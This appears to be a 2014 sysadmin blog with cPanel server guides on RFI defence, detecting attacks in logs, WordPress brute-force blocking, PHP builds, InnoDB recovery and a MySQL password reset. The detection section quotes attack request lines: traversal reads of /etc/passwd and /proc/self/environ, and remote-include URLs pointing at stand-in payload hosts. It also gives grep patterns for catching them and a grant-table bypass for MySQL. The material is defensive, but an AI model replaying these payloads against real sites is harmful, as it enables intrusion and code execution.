Friday, November 14, 2014

Remote File Inclusion (RFI) attacks


Remote File Inclusion (RFI) is a technique used to attack Web applications from a remote computer. Such attacks allow malicious users to run their own code on a vulnerable Web server by getting the application to include code fetched from a URL on a server they control. When the application executes the malicious code, the result can be a backdoor on the server or disclosure of technical information. This is an application vulnerability that results from insufficient validation of user input.



Disable allow_url_fopen in php.ini by setting it to 0

Enable safe_mode and set open_basedir restrictions (if you know what you're doing - it's not really that safe!)

Lockdown the server environment to prevent the server from making new outbound requests

Using Apache mod_rewrite is also an effective security measure to prevent RFI attacks. To use it, in your .htaccess, add the following lines:

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [F,L]

The RewriteCond matches the pattern against the query string, and the RewriteRule decides what happens to a matching request. Here the F flag answers with 403 Forbidden and L stops further rewriting, so the request is blocked. Note that %{QUERY_STRING} is matched as sent, without URL decoding, so this pattern only catches a literal scheme such as http:// and should be treated as an extra layer on top of allow_url_include=off, not as a replacement for it.

There are two php.ini options you can set, which control different aspects of file handling and work to prevent RFI:

allow_url_fopen=off
allow_url_include=off

The magic_quotes directives represent PHP functionality that automatically escapes quotes passed by the user to the application. For example, in php.ini, setting magic_quotes_gpc=On automatically escapes all single and double quotes, backslashes and NULs with a backslash in GET, POST and cookie data. The other magic quote directive (magic_quotes_runtime=On) escapes quotes in data returned by a select list of functions. Both directives were deprecated in PHP 5.3 and removed in PHP 5.4, so they are only available on older installations.

Apache log poisoning with LFI




Apache normally uses two log files: access_log, which contains all valid requests to the Web server, and error_log, which contains error messages. Depending on the distribution and build, these logs are typically found in one of the following locations:

/etc/httpd/logs/, /opt/lampp/logs/, /usr/local/apache/log, /usr/local/apache/logs/, /usr/local/etc/httpd/logs/, /usr/local/www/logs/thttpd_log, /var/apache/logs/, /var/log/apache/, /var/log/apache-ssl/, /var/log/httpd/, /var/log/httpsd/ssl.access_log


RFI Detection

Just a few commands to find out who's knocking. Feel free to expand on what's here as new RFI attacks are discovered.


grep -hr '\.\.\/\.\.\/' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

grep -hr '\/etc\/passwd' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

Real World Output (target domain omitted to protect the innocent):
~~~~~~~~~~~
208.158.248.5 - example.com - "//lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
207.191.225.14 - example.com - "/ssa-pampanga-pg-wisdom-v-13xSmAeUo2o.html/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
207.191.225.14 - example.com - "/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
67.207.138.14 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
21.26.32.199 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
~~~~~~~~~~~




grep -hr 'SERVEQDOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

207.191.225.14 - example.com - "/?_SERVEQDOCUMENT_ROOT=http://www.some-RFI-rooted-site.or.kr/bbs/data/zfxid1.txt?"

grep -hr 'DOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

21.206.20.162 - example.com - "///?_SERVER[DOCUMENT_ROOT]=http://some-RFI-rooted-site.ca/bbs//nyawa.txt??"
10.45.14.165 - example.com - "/%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.some-RFI-rooted-site.com.au/nGagLiks/myfiles/zfxid1.txt?"

grep -hr '\.txt??' /usr/local/apache/logs/*_log | grep -v '\/robots.txt' | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

10.45.14.165 - example.com - "//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://some-RFI-rooted-site.co.kr/plugins/logs/gue/fx29id.txt??"
21.206.20.162 - example.com - "/ashop/catalogue.php?cat=http://www.some-RFI-rooted-site.com//pdf/1.txt??"
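The greps above match literal strings, so a request that percent-encodes its payload (http%3A%2F%2F, %2e%2e%2f) slips past them, just as it slips past the RewriteCond earlier on this page. The script below is an added example, not part of the original post: it URL-decodes each request target (twice, to catch double encoding) before classifying it as RFI, LFI or traversal, then counts hits per source IP. The log lines it runs on are constructed; the addresses and the host name rfi-host.example are documentation values, not real indicators.

```shell
#!/bin/sh
# Added example (not from the original post): decode-then-classify RFI/LFI
# probes in an Apache/cPanel combined-format access log, then count per IP.
# Assumes the line layout quoted above: IP - - [date] "GET /target HTTP/1.1" ...

# Constructed sample log: RFC 5737 documentation addresses, not real indicators.
SAMPLE_LOG=$(cat <<'EOF'
192.0.2.21 - - [14/Nov/2014:10:00:01 +0000] "GET //admin/index.php?_SERVER[ConfigFile]=../../../../etc/passwd HTTP/1.1" 404 210
192.0.2.22 - - [14/Nov/2014:10:00:05 +0000] "GET /?pg=../../../../proc/self/environ HTTP/1.1" 200 512
198.51.100.7 - - [14/Nov/2014:10:00:09 +0000] "GET /?_SERVER[DOCUMENT_ROOT]=http://rfi-host.example/zfxid1.txt?? HTTP/1.1" 200 900
203.0.113.9 - - [14/Nov/2014:10:00:12 +0000] "GET /ashop/catalogue.php?cat=http%3A%2F%2Frfi-host.example%2F1.txt%3F%3F HTTP/1.1" 200 900
203.0.113.9 - - [14/Nov/2014:10:00:13 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210
192.0.2.10 - - [14/Nov/2014:10:00:20 +0000] "GET /index.php?page=about HTTP/1.1" 200 1200
192.0.2.10 - - [14/Nov/2014:10:00:21 +0000] "GET /robots.txt HTTP/1.1" 200 40
EOF
)

# rfi_scan [logfile...]: print "IP<TAB>CATEGORY<TAB>raw target" per suspicious request.
rfi_scan() {
  awk '
  BEGIN {
    for (i = 0; i < 16; i++) { hex[sprintf("%x", i)] = i; hex[sprintf("%X", i)] = i }
  }
  # One percent-decoding pass; "+" becomes a space as in form encoding.
  function urldecode(s,    out, c, v) {
    out = ""
    while (s != "") {
      c = substr(s, 1, 1)
      if (c == "%" && (substr(s, 2, 1) in hex) && (substr(s, 3, 1) in hex)) {
        v = hex[substr(s, 2, 1)] * 16 + hex[substr(s, 3, 1)]
        out = out (v == 0 ? "<NUL>" : sprintf("%c", v))   # keep NUL visible, not embedded
        s = substr(s, 4)
      } else {
        out = out (c == "+" ? " " : c)
        s = substr(s, 2)
      }
    }
    return out
  }
  {
    q = index($0, "\"")
    if (q == 0) next
    req = substr($0, q + 1)                  # GET /target HTTP/1.1 ...
    e = index(req, "\"")
    if (e > 0) req = substr(req, 1, e - 1)
    split(req, part, " ")
    target = part[2]
    if (target == "") next
    # Two passes so double-encoded payloads (%252e) are seen as well.
    low = tolower(urldecode(urldecode(target)))
    cat = ""
    if (low ~ /=[a-z]+:\/\//)                cat = "RFI"          # scheme:// in a parameter value
    else if (low ~ /\/proc\/self\/environ/)  cat = "LFI-environ"
    else if (low ~ /\/etc\/passwd/)          cat = "LFI-passwd"
    else if (low ~ /\.\.\//)                 cat = "TRAVERSAL"
    if (cat != "") printf "%s\t%s\t%s\n", $1, cat, target
  }' "$@"
}

# rfi_summary [logfile...]: suspicious requests per source IP, most active first.
rfi_summary() {
  rfi_scan "$@" | awk '{ n[$1]++ } END { for (ip in n) printf "%d %s\n", n[ip], ip }' | sort -rn
}

# Demo on the constructed log: 5 of the 7 lines are flagged, 203.0.113.9 twice.
printf '%s\n' "$SAMPLE_LOG" | rfi_scan
printf '%s\n' "$SAMPLE_LOG" | rfi_summary
```

On a real server run `rfi_summary /usr/local/apache/logs/*_log` (or the domlogs) instead of the sample.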


With such a vulnerability, attackers can execute any binary on the server, such as starting a telnet server, logging in to it with the privileges of the Web server user, running exploits to gain root access, and perhaps attacking other hosts that are reachable from the compromised server.


Reference

https://documentation.cpanel.net/display/CKB/PHP+Security+Concepts

Wednesday, November 12, 2014

Linux commands for verifying CMS versions on a cPanel server

WordPress version:

find /home/*/public_html/ -type f -iwholename "*/wp-includes/version.php" -exec grep -H "\$wp_version =" {} \;


Joomla! 1/2/3 version and release:
Linux/cPanel:
find /home/*/public_html/ -type f \( -iwholename '*/libraries/joomla/version.php' -o -iwholename '*/libraries/cms/version.php' -o -iwholename '*/libraries/cms/version/version.php' \) -print -exec perl -e 'while (<>) { $release = $1 if m/ \$RELEASE\s+= .([\d.]+).;/; $dev = $1 if m/ \$DEV_LEVEL\s+= .(\d+).;/; } print qq($release.$dev\n);' {} \; && echo "-"

Drupal version
Linux/cPanel:
find /home/*/public_html/ -type f -iwholename "*/modules/system/system.info" -exec grep -H "version = \"" {} \;
Linux/Plesk:

Friday, October 31, 2014

How to prevent DoS attack on a cPanel server

Check and block WordPress wp-login and xmlrpc attacks on a cPanel server


If you are seeing a lot of requests to wp-login.php, you can treat it as a WordPress attack. The command below shows a sorted list of the IPs accessing wp-login.php:


====
-----------

egrep 'wp-login.php' /usr/local/apache/domlogs/* | grep -v ftp_log | awk -F : '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n

====
-----------
We can get the IPs hitting xmlrpc.php on a given day from the access logs with the command below (xx/Aug/2014 is the date placeholder):

grep -r "xx/Aug/2014" /usr/local/apache/domlogs/ | grep "xmlrpc.php" | awk '{ print $1 }' | cut -d : -f2 | sort | uniq -c | sort -n > /root/testwp

-----------
grep wp-login.php /usr/local/apache/domlogs/* | grep "16/Jan/2013:03" | awk '{print $1}' | cut -d: -f2 | sort | uniq -c | sort -n | tail
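As an added example (not from the original post), the function below refines the counts above in three ways: it only counts POST requests to wp-login.php or xmlrpc.php, so visitors merely loading the login page do not count; it buckets them per source IP per minute, so a burst stands out from a day's total; and it validates that the first log field really is an IPv4 address before printing it, since the output is meant to be fed to csf -d. The log lines are generated inline and are constructed, using RFC 5737 documentation addresses.

```shell
#!/bin/sh
# Added example (not from the original post): per-IP, per-minute POST counts
# against wp-login.php / xmlrpc.php from a cPanel domlog, with IPv4 validation
# so the output can be handed to "csf -d" safely.

# gen IP MINUTE COUNT METHOD PATH: emit COUNT constructed combined-format lines.
gen() {
  i=0
  while [ "$i" -lt "$3" ]; do
    i=$((i + 1))
    printf '%s - - [16/Jan/2013:%s:%02d +0000] "%s %s HTTP/1.1" 200 3512\n' "$1" "$2" "$i" "$4" "$5"
  done
}

# Constructed sample traffic (documentation addresses only).
build_sample() {
  gen 198.51.100.7 03:00 12 POST /wp-login.php     # burst: 12 attempts in one minute
  gen 198.51.100.7 03:01  3 POST /wp-login.php
  gen 203.0.113.9  03:00  2 POST /xmlrpc.php
  gen 192.0.2.5    03:00  8 GET  /wp-login.php     # only loading the login page
  gen 'not-an-ip;' 03:00 20 POST /wp-login.php     # garbage first field: must never be printed
  gen 999.1.1.1    03:00 20 POST /xmlrpc.php       # malformed octet: must never be printed
}

# wp_bruteforce_peaks THRESHOLD [logfile...]: print "IP PEAK" for every source whose
# busiest single minute of POSTs to wp-login.php/xmlrpc.php reached THRESHOLD.
wp_bruteforce_peaks() {
  thr=$1; shift
  awk -v thr="$thr" '
  function valid_ip(ip,    o, k) {
    if (ip !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) return 0
    split(ip, o, ".")
    for (k = 1; k <= 4; k++) if (o[k] + 0 > 255) return 0
    return 1
  }
  $6 == "\"POST" && $7 ~ /^\/(wp-login|xmlrpc)\.php(\?|$)/ {
    if (!valid_ip($1)) next
    minute = substr($4, 2, 17)            # [16/Jan/2013:03:00:01 -> 16/Jan/2013:03:00
    n[$1 SUBSEP minute]++
  }
  END {
    for (key in n) {
      split(key, p, SUBSEP)
      if (n[key] > peak[p[1]]) peak[p[1]] = n[key]
    }
    for (ip in peak) if (peak[ip] >= thr) printf "%s %d\n", ip, peak[ip]
  }' "$@" | sort -k2,2nr
}

# Demo: only 198.51.100.7 (12 POSTs in minute 03:00) crosses a threshold of 10.
build_sample | wp_bruteforce_peaks 10
```

On a real server replace the sample with `wp_bruteforce_peaks 10 /usr/local/apache/domlogs/*` and pipe the result into a loop that calls csf -d.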



CSF tuning 

vi /etc/csf/csf.conf
----
# To disable this feature, set this to 0
CT_LIMIT = "50"
----


Where 50 is the maximum number of connections from an IP address. You need to specify the port number also.



vi /etc/csf/csf.conf
----
# Leave this option empty to count all ports against CT_LIMIT
CT_PORTS = "80,53,22"
----


Other CT options can also be tuned:

CT_INTERVAL = "30"
CT_BLOCK_TIME = "1800"



IPTable rule:

iptables -A INPUT -p tcp --dport 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT

------------------------
-A : Append the rule to the chain
-p : Protocol
--dport : Destination port
-m limit : Use the limit match extension
--limit 25/minute : Defines a maximum of 25 connections per minute.
--limit-burst 100 : The per-minute limit is enforced only after the total number of connections has reached the limit-burst level, i.e. 100 here
-j : Target

Note that this rule on its own only ACCEPTs the traffic that is within the limit; anything above it simply falls through to the rules after it, so a DROP rule for port 80 must follow this one for the limit to do anything. As written it also counts every packet to port 80 rather than new connections; add --syn if only connection attempts should count.

--------------------------






Wednesday, August 27, 2014

Running Multiple PHP 5 Versions

cPanel does not support this directly through EasyApache.





To my knowledge you either need to do this manually or use CloudLinux, which offers an add-on for this purpose.


For CloudLinux please follow the steps below.

http://docs.cloudlinux.com/index.html?installation.html

NB: You must have cagefs & lvemgr installed for this to work

http://docs.cloudlinux.com/index.html?cagefs.html

Recompile and install the default PHP (Optional)

If the existing installation is fine and has the necessary modules, then you can skip this step. Otherwise you need to recompile it using :D

/scripts/easyapache

Once that is done, you can proceed with the new PHP 5.4.14.


Step 1:

Download the source file

mkdir /usr/local/src/php_source

cd /usr/local/src/php_source
wget http://in2.php.net/get/php-5.4.8.tar.gz/from/us1.php.net/mirror

Extract the source
tar -xvf php-5.4.14.tar.bz2

You can get the configuration options for the new install from the existing installation using the following command:
php -i |grep configure|sed 's/Configure Command =>  //g'|sed "s/'//g"

Once you have it, modify it: make sure the installation path --prefix is specified and that PHP is built as CGI with the option --enable-cgi. In this case I am using the installation path --prefix=/usr/local/php54.
Make sure to remove the configuration parameter for apxs, i.e. --with-apxs2=/usr/local/apache/bin/apxs
The final configuration options for the new install will look like the following:

 ./configure  --disable-fileinfo --disable-phar --enable-bcmath --enable-calendar --enable-libxml --enable-mbstring --enable-pdo=shared --enable-soap --enable-sockets --enable-wddx --enable-zend-multibyte --enable-zip --prefix=/usr/local/php54 --enable-cgi --with-bz2 --with-curl=/opt/curlssl/ --with-curlwrappers --with-freetype-dir=/usr --with-gd --with-gettext --with-imap=/opt/php_with_imap_client/ --with-imap-ssl=/usr --with-jpeg-dir=/usr --with-kerberos --with-libdir=lib64 --with-libexpat-dir=/usr --with-libxml-dir=/opt/xml2/ --with-mcrypt=/opt/libmcrypt/ --with-mm=/opt/mm/ --with-mysql=/usr --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=/usr/bin/mysql_config --with-openssl=/usr --with-openssl-dir=/usr --with-pcre-regex=/opt/pcre --with-pdo-mysql=shared --with-pdo-sqlite=shared --with-pic --with-png-dir=/usr --with-pspell --with-tidy=/opt/tidy/ --with-xmlrpc --with-xpm-dir=/usr --with-xsl=/opt/xslt/ --with-zlib --with-zlib-dir=/usr

Once the configuration is complete, compile using the following command:

make
Now proceed with the installation

make install

Once the installation is complete you will get an output like the following one

# make install
Installing shared extensions:     /usr/local/php54/lib/php/extensions/no-debug-non-zts-20100525/
Installing PHP CLI binary:        /usr/local/php54/bin/
Installing PHP CLI man page:      /usr/local/php54/php/man/man1/
Installing PHP CGI binary:        /usr/local/php54/bin/

Once the installation is completed, confirm the version by using the command

#  /usr/local/php54/bin/php -v
PHP 5.4.14 (cli) (built: May  3 2013 12:21:56)
Copyright (c) 1997-2013 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2013 Zend Technologies

Now we need to configure it for web server access

This is done by specifying a new PHP handler for .php files.

AddHandler specifically is meant to communicate with the server. It assigns or "maps" a handler to the file extension you specify, giving the server instructions on how to deal with it. For example, AddHandler could be used to activate a particular file type, which is why it must communicate with the server.

Eg:

AddHandler application/x-httpd-php54 .php
The AddHandler directive tells Apache that whenever it encounters a file with a .php extension, it should mark it as having a MIME type of application/x-httpd-php54.


Action application/x-httpd-php54 /cgi-sys/php54
The Action directive tells Apache that whenever it encounters a file of type application/x-httpd-php54 it should pass it to the script /cgi-sys/php54 and capture the output.

Assume that you are working on a default cPanel server.

Open the file /usr/local/apache/conf/includes/pre_virtualhost_global.conf, add the following lines and save:

Action application/x-httpd-php54 /cgi-sys/php54
AddType application/x-httpd-php54 .php54

To make cPanel skip the .htaccess scan and remove the mime types, do the following:

/usr/local/cpanel/bin/apache_conf_distiller --update
touch /var/cpanel/easy_skip_update_php_mime_types

vi /usr/local/cpanel/cgi-sys/php54
Add the following contents to the above file and save
#!/bin/sh
exec /usr/local/php54/bin/php-cgi
Setting Permissions
chown root:wheel /usr/local/cpanel/cgi-sys/php54
chmod +x /usr/local/cpanel/cgi-sys/php54
Soft-linking for command-line executions:
ln -s /usr/local/php54/bin/php-cgi /usr/local/bin/php54

Copying php.ini from build folder
mv /usr/local/php_source/php.ini-production /usr/local/php54/lib/php.ini
You need to restart httpd after the configuration
/etc/init.d/httpd restart
Now everything is set. If you want to enable PHP 5.4 for a particular account, create a .htaccess file as shown below.

nano -w /home/$username/public_html/.htaccess
AddHandler application/x-httpd-php54 .php

chown $username:$username /home/$username/public_html/.htaccess
chmod 644 /home/$username/public_html/.htaccess


Thursday, August 14, 2014

InnoDB Crash Recovery Guide


STOP : If there are any problems or you are uncomfortable doing this procedure, do not proceed and ASK A COWORKER  :D :D :D 

  • Make sure you have free disk space in /home and /var/lib/mysql or where ever your mysql databases are stored. This guide assumes they are in /var/lib/mysql.

FOR CPANEL

Step 1: Disable tailwatchd (chkservd on 11.23) to prevent mysql from being restarted. Stop any other processes that may access mysql including munin, backups, and the webserver if possible.
 killall -TERM tailwatchd
Step 2: Add
 innodb_force_recovery = 3
to /etc/my.cnf
Step 3: Restart mysql
 /etc/init.d/mysqld restart
Step 4: Verify mysql is up
Step 5: Put this script in ~/recover.pl and run it
#!/usr/bin/perl
 
BEGIN { unshift @INC, '/usr/local/cpanel'; }
 
use Cpanel::MysqlUtils         ();
use IPC::Open3                 ();    # sqlcmd() below calls IPC::Open3::open3
 
mkdir('/home/innodb_dumps',0700);
 
chdir('/home/innodb_dumps') || die "Could not chdir to /home/innodb_dumps: $!";
 
my $pwd = `pwd`;
chomp($pwd);
my $hasinnodb = 0;
my $dbdir     = Cpanel::MysqlUtils::getmysqldir();
my $dbcheckok = -d $dbdir . '/mysql' ? 1 : 0;
if ($dbcheckok) {
    opendir( my $sql_dh, $dbdir ) || die "Could not open $dbdir: $!";
    while ( my $db = readdir($sql_dh) ) {
        next if ( $db =~ m/^\.+$/ );
        next if $db eq 'mysql';    # mysql db should never have InnoDB on
        next if $db eq 'horde';    # Horde session table is the only one that uses InnoDB, so this is not a problem
        next if ( !-d $dbdir . '/' . $db );
        my $ms = sqlcmd("show table status from `$db`;");
        if ( !$ms ) {
            $dbcheckok = 0;
            last;
        }
        elsif ( $ms =~ m/\s+InnoDB\s+/m ) {
                print "Saving to $pwd/$db.sql...";
                # Abort on a failed dump rather than leave a truncated .sql file behind
                system("mysqldump -c $db > $db.sql") == 0 or die "mysqldump failed for $db (exit $?)\n";
                print "Done\n";
        }
    }
    closedir($sql_dh);
}
 
 
 
 
sub sqlcmd {
    my ($cmd) = @_;
    my $result;
 
    my $mysql = Cpanel::MysqlUtils::find_mysql();
    my $pid = IPC::Open3::open3( \*WTRFH, \*RDRFH, ">&STDERR", $mysql, '-N' );
    print WTRFH "show status like 'uptime'; $cmd\n";    #make sure we already get something back so we know mysql is up
    close(WTRFH);
    while (<RDRFH>) {
        $result .= $_;
    }
    close(RDRFH);
    waitpid( $pid, 0 );
    return $result;
}
If the script fails, remove your backup attempt in /home/innodb_dumps, increase the innodb_force_recovery level in /etc/my.cnf, restart MySQL, and rerun the script. Repeat until you complete a backup without errors.
Step 6: Stop MySQL
Step 7: Do this:
 mkdir /var/lib/mysql/INNODB_BACKUPS
 mv /var/lib/mysql/ib* /var/lib/mysql/INNODB_BACKUPS
cd /home/innodb_dumps
for f in *.sql ; do i=${f%.sql} ; mv "/var/lib/mysql/$i" /var/lib/mysql/INNODB_BACKUPS/ ; mkdir "/var/lib/mysql/$i" ; chown mysql. "/var/lib/mysql/$i" ; done
Step 8: For each database that was dumped to /home/innodb_dumps move (do not copy, completely move, or the database may not be properly recreated from the backups you made) the /var/lib/mysql/DBNAME folder to the /var/lib/mysql/INNODB_BACKUPS directory
Step 9: Create folders for each database that was moved in /var/lib/mysql and chown them to mysql:mysql
Step 10: Remove the following from my.cnf and start mysql:
 innodb_force_recovery = 3
Step 11: Start mysql and restore all databases in /home/innodb_dumps to their respective database
cd /home/innodb_dumps
for i in *.sql ; do x=${i%.sql} ; mysql -o "$x" < "$i" ; done
Step 12: Check the mysql server logs to ensure there were no errors
Step 13: Restart mysql and party.

FOR ALL OTHER LINUXES 

Step 1: Add
 innodb_force_recovery = 3
to /etc/my.cnf
Step 2: Restart mysql
 /etc/init.d/mysqld restart
Step 3: Verify mysql is up
Step 4: Dump all InnoDB databases to a directory, e.g. /root or /root/recovery
Step 5: Stop MySQL
Step 6: Do this:
 mkdir /var/lib/mysql/INNODB_BACKUPS
 mv /var/lib/mysql/ib* /var/lib/mysql/INNODB_BACKUPS
Step 7: For each database that was dumped move the /var/lib/mysql/DBNAME folder to the /var/lib/mysql/INNODB_BACKUPS directory
Step 8: Create folders for each database that was moved in /var/lib/mysql and chown them to mysql:mysql
Step 9: Remove the following from my.cnf and start mysql:
 innodb_force_recovery = 3
Step 10: Start mysql and restore all databases in /home/innodb_dumps to their respective database
Step 11: Check the mysql server logs to ensure there were no errors
Step 12: Restart mysql and party.

Installing and Configuring LiteSpeed Web Server (LSWS) and The PHP

Installing 

The installation of LSWS is pretty straight forward. You can actually install it anywhere but for the sake of simplicity and standardization, we will always be installing it to /opt on the server. This way, if there is a problem and it needs to be checked on, we will always know where it is. Additionally, as you will see from the setup steps below, these too will be the standard install. Lastly, for standardization, please make sure that during the install LSWS is set to listen on 7080 (admin console) and 8088 (verification page).

The installation 

SSH into the box as root
chmod 0755 /usr/bin/gcc

cd /opt

Download the installation files to /opt and untar them. All available versions of LiteSpeed Web Server can be found at http://www.litespeedtech.com/products/webserver/download/. Please also note that we only provide licensing and support for the Enterprise edition and not Standard, so when installing this for a client, you will need to have the registration number.

wget http://www.litespeedtech.com/packages/4.0/lsws-4.0-ent-i386-linux.tar.gz

tar -zxvf lsws-4.0-ent-*

cd lsws*

Now, you need to get the serial number for the install. To do this, cd into the installation folder (the same one that contains install.sh) and from the command line, without the quotes, as root, run:

echo "SERIAL NUMBER GOES HERE" > serial.no
chmod +x install.sh
./install.sh

The install should now be moving along. For the specifics on the install, please refer to the below prompts:

Installation Prompts 

Prepare PHP 

PHP is somewhat of an inconvenience on LSWS as it uses its own "special" kind of PHP with certain CFLAGS, the most important of which are --prefix=/lsphp5 and --with-litespeed. If you compile PHP through EasyApache, you will not break anything, however the changes will not be used by LiteSpeed, and as such you need to compile PHP through LiteSpeed. Thankfully this is pretty straightforward, just a little more time consuming. The below addresses recompiling PHP to add something to it.

First, SSH into the box as root. Next, find out what CFLAGS the current PHP version was built with: run php -i | less and look at the Configure Command => line, which lists all of the flags used to compile it originally. When we do this on a testing box, we see:


'./configure' '--prefix=/lsphp5' '--with-litespeed' '--disable-pdo' '--enable-bcmath' '--enable-calendar' '--enable-ftp' '--enable-gd-native-ttf' '--enable-libxml' '--enable-magic-quotes' '--enable-sockets' '--enable-zip' '--prefix=/usr/local' '--with-apxs2=/usr/local/apache/bin/apxs' '--with-bz2' '--with-curl=/opt/curlssl/' '--with-freetype-dir=/usr' '--with-gd' '--with-imap=/opt/php_with_imap_client/' '--with-imap-ssl=/usr' '--with-jpeg-dir=/usr' '--with-kerberos' '--with-libxml-dir=/opt/xml2/' '--with-mcrypt=/opt/libmcrypt/' '--with-mhash=/opt/mhash/' '--with-mysql=/usr' '--with-mysql-sock=/var/lib/mysql/mysql.sock' '--with-png-dir=/usr' '--with-ttf' '--with-xpm-dir=/usr/X11R6' '--with-zlib' '--with-zlib-dir=/usr'

Now that we know what CFLAGS were given by EasyApache, we need to migrate those to the LSWS PHP installation. This is kind of a crappy way to do it but it's how it will get done. Copy the CFLAGS you get from the above command and put them in notepad. On the server:

mkdir ~/phptest && cd ~/phptest
wget http://us2.php.net/get/php-5.2.9.tar.gz/from/uk.php.net/mirror (or get whatever source version they are getting)
tar -zxvf php-*
cd php-*
./buildconf --force
Now we need to do a dry run of the CFLAGS to make sure that they will be parsed properly when compiling through LSWS's PHP thing. Take the CFLAGS you will need to add, and include them to your ./configure line that you put on notepad. So, if they want to recompile PHP with TTF, you would add:

'./configure' '--prefix=/lsphp5' ... '--with-ttf'

So, from the PHP source directory, run the configure command and make sure that it exits cleanly. You will likely need to yum -y install package and package-devel for it to compile cleanly. You could always specify the EasyApache directory but I haven't tested anything other than default in LSWS's PHP installer/compiler. For example, if you were trying to compile with TTF as seen above, and it throws an error about not being able to find the headers, simply yum -y install ttf ttf-devel. Once you have a ./configure line like that which completes cleanly, you then need to port the CFLAGs to the LSWS PHP compiler admin thing.

Config PHP in LSWS 


First, log into the LSWS admin console with the LSWS username and password

Then, navigate to the PHP compilation section which can be found at

We then need to put the CFLAGs into the appropriate window which is pretty easy to spot.

Note that when setting the CFLAGS you do not need to enclose them in ' ' as you do when compiling from the command line.

 ./configure --prefix=/lsphp5 --with-litespeed --disable-pdo --enable-bcmath --enable-calendar --enable-ftp --enable-gd-native-ttf --enable-libxml --enable-magic-quotes --enable-sockets --enable-zip --prefix=/usr/local --with-apxs2=/usr/local/apache/bin/apxs --with-bz2 --with-curl=/opt/curlssl/ --with-freetype-dir=/usr --with-gd --with-imap=/opt/php_with_imap_client/ --with-imap-ssl=/usr --with-jpeg-dir=/usr --with-kerberos --with-libxml-dir=/opt/xml2/ --with-mcrypt=/opt/libmcrypt/ --with-mhash=/opt/mhash/ --with-mysql=/usr --with-mysql-sock=/var/lib/mysql/mysql.sock --with-png-dir=/usr --with-ttf --with-xpm-dir=/usr/X11R6 --with-zlib --with-zlib-dir=/usr

Reset MySQL Password

Of course you can easily reset it through cPanel.

Or on debian you can reset it with

dpkg-reconfigure <mysql package>
You can find the package by typing

dpkg --list | grep mysql
dpkg-reconfigure mysql-server-5.0

But just in case none of those ways are available, you can get mysql to start without asking for a password.

Allowing MySQL to start without asking for a password

First, stop MySQL from running.

Debian/CentOS

/etc/init.d/mysql stop
Then start it, but tell it not to load the grant tables

mysqld --user=mysql --skip-grant-tables &

While it runs like this, anyone who can reach the server gets in without a password, so do it quickly and consider adding --skip-networking so that only local socket connections are accepted until you are done.

Reset the password 

mysql

UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
Then do what you want. If you just need root access to dump a database or something, you don't even need to change the password.

Should work for other users if you need that password for whatever reason and can't find it.

Restarting the mysql service 

killall mysqld
/etc/init.d/mysql start
   

DDOS Auto block script CSF


This script can be used with csf to block connections on a server automatically if a client is getting really flooded. To use it you must change the deny limit (DENY_IP_LIMIT) in /etc/csf/csf.conf from 100 to 0, restart csf and load this script up.


#!/bin/bash

# Count current connections per remote IP to local port 80 (match the local
# address column only, so 8080 and outbound connections to port 80 are not counted).
netstat -anp | awk '$4 ~ /:80$/ {print $5}' | cut -d: -f1 | sort | uniq -c | sort -n > ~/curr

blocked=no
while read -r conns ip
do
        if [ "$conns" -ge 20 ]
        then
                # Exact match on the first field of csf.deny, so 10.0.0.1 does not match 10.0.0.10
                if ! awk -v ip="$ip" '$1 == ip {found=1} END {exit !found}' /etc/csf/csf.deny
                then
                        echo "blocking $ip with $conns connections"
                        iptables -I INPUT -s "$ip" -j DROP
                        echo "$ip" >> /etc/csf/csf.deny
                        blocked=yes     # only restart httpd when something new was blocked
                fi
        fi
done < ~/curr

if [ "$blocked" = "yes" ]
then
        /etc/init.d/httpd stop
        pkill httpd
        /etc/init.d/httpd start
fi
Put it in ~ on the server (the crontab line below assumes /root/autoblock.sh) and add it to the crontab like so:
 */1 * * * * /root/autoblock.sh >> /var/log/autoblock
and change the 20 next to -ge to whatever connection threshold you want on port 80.

Wednesday, July 30, 2014

Linux Memory Troubleshooting

Empty buffer cache
sync && echo 1 > /proc/sys/vm/drop_caches

Clean up memory of unnecessary things (kernel 2.6.16 or newer). Run sync first to flush useful things out to disk!!!
To free pagecache:

echo 1 > /proc/sys/vm/drop_caches    

To free dentries and inodes:

echo 2 > /proc/sys/vm/drop_caches

To free pagecache, dentries and inodes:

